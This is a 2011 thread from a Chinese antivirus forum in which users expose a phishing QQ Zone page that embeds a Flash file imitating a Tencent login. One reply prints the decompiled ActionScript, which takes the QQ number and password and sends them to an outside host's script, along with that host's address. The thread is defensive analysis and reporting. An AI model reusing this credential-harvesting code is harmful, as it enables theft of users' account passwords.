查看: 2311|回复: 10
收起左侧

[已鉴定] [某人QQZone] hxxp://806746439.qzone.qq.com/ [钓鱼]

 关闭 [复制链接]
大猫熊
发表于 2011-7-17 19:31:11 | 显示全部楼层 |阅读模式
hxxp://806746439.qzone.qq.com/



内嵌一个flash,地址hxxp://web0622155.w201.dns558.com/78dsdx/6sd/1233.swf,用于获得用户账号密码。


很低级的手段。。。
佩恩无视一切
发表于 2011-7-17 20:19:53 | 显示全部楼层
TM截图未命名.png

是这个吗?我以为是真的,幸好没输入。因为我QQ上着,打开空间的时候是不用再输入帐号密码的。哈哈哈 。举报他。
大猫熊
 楼主| 发表于 2011-7-17 20:34:34 | 显示全部楼层
佩恩无视一切 发表于 2011-7-17 20:19
是这个吗?我以为是真的,幸好没输入。因为我QQ上着,打开空间的时候是不用再输入帐号密码的。哈哈哈 。 ...

就是这个。。。
帅就是帅
发表于 2011-7-17 20:36:09 | 显示全部楼层
呃,确实很低级,1233.swf,恶意

01.png
大猫熊
 楼主| 发表于 2011-7-17 20:47:01 | 显示全部楼层
帅就是帅 发表于 2011-7-17 20:36
呃,确实很低级,1233.swf,恶意

phishing.png


这样看还是挺能忽悠人的。。。
帅就是帅
发表于 2011-7-17 20:50:04 | 显示全部楼层
本帖最后由 帅就是帅 于 2011-7-17 21:11 编辑
alexyangjie 发表于 2011-7-17 20:47
这样看还是挺能忽悠人的。。。


02.png

03.png


果然还实时更新,再进就不一样了。。。。

====

1.无论如何输入密码都会提示密码错误;
2.无论使用什么浏览器(火狐等),均为"IE"提示错误;
3.验证码也不会变,只为那一个。

可屏蔽该swf文件正常访问空间,则看出原样。

已举报
是昔流芳
发表于 2011-7-17 22:02:53 | 显示全部楼层
?// Action script...

// [onClipEvent of sprite 66 in frame 1]
onClipEvent (load)
{
   
this.gotoAndStop(Number(1 + random(8) * 20));
}

// [onClipEvent of sprite 66 in frame 5]
onClipEvent (load)
{
   
this.gotoAndStop(Number(1 + random(8) * 20));
}

// [Action in Frame 1]
function gomy()
{
   
getURL("http://qq.com");
}
// End of the function
var mymenu = new ContextMenu();
Stage.scaleMode = "noscale";
mymenu.hideBuiltInItems();
mymenu.customItems.push(new ContextMenuItem("All Rights Reserved ", gomy));
mymenu.customItems.push(new ContextMenuItem("腾迅科技", gomy));
_root.menu = mymenu;
var str = "http://web0622155.w201.dns558.com/78dsdx/6sd/qq.asp";
var cou = 0;
ntxt.restrict = "0-9";
var scData = new LoadVars();
scData.onLoad = function (success)
{
    ++
cou;
   
if (cou > 1)
    {
        
_root.gotoAndStop(41);
    }
// end if
};
sub_btn.onRelease = function ()
{
   
var _loc2 = ntxt.text;
   
var _loc1 = ptxt.text;
   
var _loc3 = rtxt.text;
   
if (_loc2 == "")
    {
        
gotoAndPlay(10);
    }
   
else if (_loc1 == "")
    {
        
gotoAndPlay(20);
    }
   
else if (_loc3 == "")
    {
        
gotoAndPlay(30);
    }
   
else
   
{
        
scData.QQNumber = _loc2;
        
scData.QQPassWord = _loc1;
        
scData.sendAndLoad(str, scData, "get");
        
gotoAndPlay(35);
    }
// end else if
};
stop ();

// [Action in Frame 4]
stop ();

// [Action in Frame 5]
function gomy()
{
   
getURL("http://qq.com");
}
// End of the function
var mymenu = new ContextMenu();
Stage.scaleMode = "noscale";
mymenu.hideBuiltInItems();
mymenu.customItems.push(new ContextMenuItem("All Rights Reserved ", gomy));
mymenu.customItems.push(new ContextMenuItem("腾迅科技", gomy));
_root.menu = mymenu;
var str = "http://web0622155.w201.dns558.com/78dsdx/6sd/qq.asp";
var cou = 0;
ntxt.restrict = "0-9";
var scData = new LoadVars();
scData.onLoad = function (success)
{
    ++
cou;
   
if (cou > 1)
    {
        
_root.gotoAndStop(41);
    }
// end if
};
sub_btn.onRelease = function ()
{
   
var _loc3 = ntxt.text;
   
var _loc2 = ptxt.text;
   
var _loc4 = rtxt.text;
   
if (_loc3 == "")
    {
        
gotoAndPlay(10);
    }
   
else if (_loc2 == "")
    {
        
gotoAndPlay(20);
    }
   
else if (_loc4 == "")
    {
        
gotoAndPlay(30);
    }
   
else
   
{
        
scData.QQNumber = _loc3;
        
scData.QQPassWord = _loc2;
        
scData.sendAndLoad(str, scData, "get");
        
_root.gotoAndStop(40);
    }
// end else if
};
stop ();

// [Action in Frame 10]
stop ();

// [Action in Frame 20]
stop ();

// [Action in Frame 30]
stop ();

// [Action in Frame 35]
stop ();

// [Action in Frame 40]
stop ();
Mr.Tong
发表于 2011-7-17 22:07:55 | 显示全部楼层
我去逗逗。。
是昔流芳
发表于 2011-7-17 22:08:47 | 显示全部楼层
帅就是帅 发表于 2011-7-17 20:50
果然还实时更新,再进就不一样了。。。。

====

不应该啊...里面还有几张的,验证码怎么会不变....
帅就是帅
发表于 2011-7-17 22:32:29 | 显示全部楼层
是昔流芳 发表于 2011-7-17 22:08
不应该啊...里面还有几张的,验证码怎么会不变....

呃,貌似是这个swf本身的问题,而且,这个似乎只是个恶作剧,并没有真正的恶意行为。。。。
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2025-3-3 07:01 , Processed in 0.142910 second(s), 19 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表